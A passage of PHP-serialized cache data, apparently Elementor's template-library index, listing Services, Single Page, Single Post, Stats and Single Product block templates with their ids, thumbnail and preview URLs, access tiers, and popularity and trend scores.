29\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_11.png\";s:12:\"tmpl_created\";i:1520443275;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-29/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:584;s:16:\"popularity_index\";i:330;s:11:\"trend_index\";i:483;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:729;a:20:{s:4:\"tmpl\";i:402;s:2:\"id\";i:4227;s:5:\"title\";s:11:\"Services 30\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_black_1.png\";s:12:\"tmpl_created\";i:1520443250;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-30/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:585;s:16:\"popularity_index\";i:351;s:11:\"trend_index\";i:553;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:730;a:20:{s:4:\"tmpl\";i:560;s:2:\"id\";i:6162;s:5:\"title\";s:11:\"Services 31\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_1.png\";s:12:\"tmpl_created\";i:1520443668;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/services-31/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:586;s:16:\"popularity_index\";i:372;s:11:\"trend_index\";i:550;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:731;a:20:{s:4:\"tmpl\";i:411;s:2:\"id\";i:4302;s:5:\"title\";s:10:\"Services 5\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_7.png\";s:12:\"tmpl_created\";i:1520443266;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:587;s:16:\"popularity_index\";i:58;s:11:\"trend_index\";i:97;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:732;a:20:{s:4:\"tmpl\";i:410;s:2:\"id\";i:4293;s:5:\"title\";s:10:\"Services 6\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_6.png\";s:12:\"tmpl_created\";i:1520443265;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:588;s:16:\"popularity_index\";i:288;s:11:\"trend_index\";i:269;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:733;a:20:{s:4:\"tmpl\";i:409;s:2:\"id\";i:4284;s:5:\"title\";s:10:\"Services 7\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_5.png\";s:12:\"tmpl_created\";i:1520443263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:589;s:16:\"popularity_index\";i:27;s:11:\"trend_index\";i:21;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:734;a:20:{s:4:\"tmpl\";i:407;s:2:\"id\";i:4268;s:5:\"title\";s:10:\"Services 8\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_4.png\";s:12:\"tmpl_created\";i:1520443259;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:590;s:16:\"popularity_index\";i:173;s:11:\"trend_index\";i:213;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:735;a:20:{s:4:\"tmpl\";i:405;s:2:\"id\";i:4252;s:5:\"title\";s:10:\"Services 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/02/Service_white_3.png\";s:12:\"tmpl_created\";i:1520443255;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/blocks/services-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:8:\"services\";s:4:\"tags\";s:12:\"[\"Services\"]\";s:10:\"menu_order\";i:591;s:16:\"popularity_index\";i:46;s:11:\"trend_index\";i:99;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:736;a:20:{s:4:\"tmpl\";i:677;s:2:\"id\";i:8676;s:5:\"title\";s:13:\"single page 1\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.6.jpg\";s:12:\"tmpl_created\";i:1527682423;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:592;s:16:\"popularity_index\";i:285;s:11:\"trend_index\";i:145;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:737;a:20:{s:4:\"tmpl\";i:678;s:2:\"id\";i:8678;s:5:\"title\";s:13:\"single page 2\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.2.jpg\";s:12:\"tmpl_created\";i:1527682780;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:593;s:16:\"popularity_index\";i:140;s:11:\"trend_index\";i:82;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:738;a:20:{s:4:\"tmpl\";i:679;s:2:\"id\";i:8679;s:5:\"title\";s:13:\"single page 3\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.3.jpg\";s:12:\"tmpl_created\";i:1527682847;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:594;s:16:\"popularity_index\";i:122;s:11:\"trend_index\";i:23;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:739;a:20:{s:4:\"tmpl\";i:680;s:2:\"id\";i:8680;s:5:\"title\";s:13:\"single page 4\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.1.jpg\";s:12:\"tmpl_created\";i:1527682896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:595;s:16:\"popularity_index\";i:373;s:11:\"trend_index\";i:190;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:740;a:20:{s:4:\"tmpl\";i:681;s:2:\"id\";i:8681;s:5:\"title\";s:13:\"single page 5\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.5.jpg\";s:12:\"tmpl_created\";i:1527682969;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:596;s:16:\"popularity_index\";i:287;s:11:\"trend_index\";i:218;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:741;a:20:{s:4:\"tmpl\";i:682;s:2:\"id\";i:8682;s:5:\"title\";s:13:\"single page 6\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.4.jpg\";s:12:\"tmpl_created\";i:1527683026;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:597;s:16:\"popularity_index\";i:412;s:11:\"trend_index\";i:227;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:742;a:20:{s:4:\"tmpl\";i:683;s:2:\"id\";i:8703;s:5:\"title\";s:13:\"single page 7\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2018/05/S_P350.7.jpg\";s:12:\"tmpl_created\";i:1527683072;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-page-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:598;s:16:\"popularity_index\";i:401;s:11:\"trend_index\";i:316;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:743;a:20:{s:4:\"tmpl\";i:640;s:2:\"id\";i:7650;s:5:\"title\";s:13:\"Single Post 1\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/single_post_1_v2.jpg\";s:12:\"tmpl_created\";i:1521557736;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:24:\"[\"Blog\",\"Post\",\"Single\"]\";s:10:\"menu_order\";i:599;s:16:\"popularity_index\";i:119;s:11:\"trend_index\";i:266;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:744;a:20:{s:4:\"tmpl\";i:639;s:2:\"id\";i:7663;s:5:\"title\";s:13:\"Single Post 2\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/single_post_2_v2.jpg\";s:12:\"tmpl_created\";i:1521547761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:24:\"[\"Blog\",\"Post\",\"Single\"]\";s:10:\"menu_order\";i:600;s:16:\"popularity_index\";i:50;s:11:\"trend_index\";i:139;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:745;a:20:{s:4:\"tmpl\";i:705;s:2:\"id\";i:9296;s:5:\"title\";s:13:\"Single Post 3\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3002.jpg\";s:12:\"tmpl_created\";i:1537440673;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:601;s:16:\"popularity_index\";i:213;s:11:\"trend_index\";i:204;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:746;a:20:{s:4:\"tmpl\";i:704;s:2:\"id\";i:9301;s:5:\"title\";s:13:\"Single Post 4\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3003.jpg\";s:12:\"tmpl_created\";i:1537440661;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:602;s:16:\"popularity_index\";i:248;s:11:\"trend_index\";i:336;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:747;a:20:{s:4:\"tmpl\";i:706;s:2:\"id\";i:9313;s:5:\"title\";s:13:\"Single Post 5\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3001.jpg\";s:12:\"tmpl_created\";i:1537440798;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:603;s:16:\"popularity_index\";i:197;s:11:\"trend_index\";i:177;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:748;a:20:{s:4:\"tmpl\";i:707;s:2:\"id\";i:9343;s:5:\"title\";s:13:\"Single Post 6\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3004.jpg\";s:12:\"tmpl_created\";i:1537443531;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:604;s:16:\"popularity_index\";i:228;s:11:\"trend_index\";i:279;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:749;a:20:{s:4:\"tmpl\";i:708;s:2:\"id\";i:9349;s:5:\"title\";s:13:\"Single Post 7\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2018/09/3005.jpg\";s:12:\"tmpl_created\";i:1537443903;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/blocks/single-post-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"single post\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:605;s:16:\"popularity_index\";i:158;s:11:\"trend_index\";i:253;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:750;a:20:{s:4:\"tmpl\";i:555;s:2:\"id\";i:6114;s:5:\"title\";s:7:\"Stats 1\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_black_6.png\";s:12:\"tmpl_created\";i:1520443659;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/stats-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:610;s:16:\"popularity_index\";i:434;s:11:\"trend_index\";i:692;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:751;a:20:{s:4:\"tmpl\";i:562;s:2:\"id\";i:6178;s:5:\"title\";s:8:\"Stats 10\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_2.png\";s:12:\"tmpl_created\";i:1520443676;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:611;s:16:\"popularity_index\";i:435;s:11:\"trend_index\";i:755;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:752;a:20:{s:4:\"tmpl\";i:561;s:2:\"id\";i:6170;s:5:\"title\";s:8:\"Stats 11\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_black_2.png\";s:12:\"tmpl_created\";i:1520443670;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:612;s:16:\"popularity_index\";i:366;s:11:\"trend_index\";i:552;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:753;a:20:{s:4:\"tmpl\";i:697;s:2:\"id\";i:9174;s:5:\"title\";s:17:\"single product 01\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product01_350.png\";s:12:\"tmpl_created\";i:1532950125;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/single-product-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:612;s:16:\"popularity_index\";i:31;s:11:\"trend_index\";i:6;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:754;a:20:{s:4:\"tmpl\";i:563;s:2:\"id\";i:6186;s:5:\"title\";s:8:\"Stats 12\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/03/progress_white_3.png\";s:12:\"tmpl_created\";i:1520443678;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:9:\"[\"Stats\"]\";s:10:\"menu_order\";i:613;s:16:\"popularity_index\";i:569;s:11:\"trend_index\";i:811;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:755;a:20:{s:4:\"tmpl\";i:698;s:2:\"id\";i:9178;s:5:\"title\";s:17:\"single product 02\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product02_350new.png\";s:12:\"tmpl_created\";i:1532951997;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/single-product-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:613;s:16:\"popularity_index\";i:66;s:11:\"trend_index\";i:42;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:756;a:20:{s:4:\"tmpl\";i:550;s:2:\"id\";i:6071;s:5:\"title\";s:8:\"Stats 13\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/numbers_white_3.png\";s:12:\"tmpl_created\";i:1520443649;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/stats-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"stats\";s:4:\"tags\";s:11:\"[\"numbers\"]\";s:10:\"menu_order\";i:614;s:16:\"popularity_index\";i:168;s:11:\"trend_index\";i:328;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:757;a:20:{s:4:\"tmpl\";i:699;s:2:\"id\";i:9180;s:5:\"title\";s:17:\"single product 03\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2018/07/single_product03_350.png\";s:12:\"tmpl_created\";i:1532952302;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/blocks/single-product-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:17:\"essential-oct2023\";s:7:\"subtype\";s:14:\"single product\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:614;s:16:\"popularity_index\";i:108;s:11:\"trend_index\";i:66;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:758;a:20:{s:4:\"tmpl\";i:554;s:2:\"id\";i:6106;s:5:\"title\";s:7:\"Stats 